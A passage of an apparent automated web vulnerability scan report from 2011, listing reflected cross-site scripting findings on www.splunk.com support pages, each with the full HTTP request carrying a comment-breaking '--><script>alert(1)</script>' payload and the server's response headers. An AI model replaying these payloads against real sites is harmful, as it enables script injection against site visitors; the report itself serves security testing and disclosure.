The value of REST URL parameter 2 is copied into an HTML comment. The payload 57e31--><script>alert(1)</script>a47570b3a69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support57e31--><script>alert(1)</script>a47570b3a69/SP-CAAAAFV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:59 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:59 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:59 GMT; path=/ ETag: f23fcd210c1e7061db40414e53e7be971296944339 Last-Modified: Sat, 05 Feb 2011 22:18:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d0b--><script>alert(1)</script>55607590eb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support/SP-CAAAAFV10d0b--><script>alert(1)</script>55607590eb7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:19:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:49:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:49:30 GMT; path=/ ETag: 972ef7a2a946758d747a5526d43fad9f1296944370 Last-Modified: Sat, 05 Feb 2011 22:19:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.619. http://www.splunk.com/view/support/SP-CAAAAFV [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support/SP-CAAAAFV
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload db595--><script>alert(1)</script>63c414c791d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support/SP-CAAAAFV?db595--><script>alert(1)</script>63c414c791d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bd8a4--><script>alert(1)</script>2275a3e00fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewbd8a4--><script>alert(1)</script>2275a3e00fd/what-is-it-data/SP-CAAACDC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:20 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:20 GMT; path=/ ETag: e4ee4f1244fdd6e178efa68fdb03fd1a1296944120 Last-Modified: Sat, 05 Feb 2011 22:15:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1761d--><script>alert(1)</script>b16b03dcf08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data1761d--><script>alert(1)</script>b16b03dcf08/SP-CAAACDC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:52 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:52 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:52 GMT; path=/ ETag: 48a40b9ca2cc3a77d477ae78367a5b681296944152 Last-Modified: Sat, 05 Feb 2011 22:15:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload c0775--><script>alert(1)</script>a2476226cd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data/SP-CAAACDCc0775--><script>alert(1)</script>a2476226cd3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.623. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/what-is-it-data/SP-CAAACDC
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a6428--><script>alert(1)</script>cd800798b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/what-is-it-data/SP-CAAACDC?a6428--><script>alert(1)</script>cd800798b9b=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: bc078e39acedd5051b0e60c2687053921296944079 Last-Modified: Sat, 05 Feb 2011 22:14:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 15d4f--><script>alert(1)</script>9419c5af0ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view15d4f--><script>alert(1)</script>9419c5af0ea/whats-new/SP-CAAAFD2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:35 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:35 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:35 GMT; path=/ ETag: 9df4af1a1593f2ff86f93d08767566901296944076 Last-Modified: Sat, 05 Feb 2011 22:14:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 5dd55--><script>alert(1)</script>a9ce0ced2e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new5dd55--><script>alert(1)</script>a9ce0ced2e1/SP-CAAAFD2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:12 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:12 GMT; path=/ ETag: 4fe12a239c14277a741318813ae441771296944112 Last-Modified: Sat, 05 Feb 2011 22:15:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4887d--><script>alert(1)</script>55ee778f148 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new/SP-CAAAFD24887d--><script>alert(1)</script>55ee778f148 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:46 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:46 GMT; path=/ ETag: 6ee65ca7b28522862124d992cced6c2d1296944146 Last-Modified: Sat, 05 Feb 2011 22:15:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.627. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/whats-new/SP-CAAAFD2
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 581fe--><script>alert(1)</script>7e2759d06a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/whats-new/SP-CAAAFD2?581fe--><script>alert(1)</script>7e2759d06a7=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; 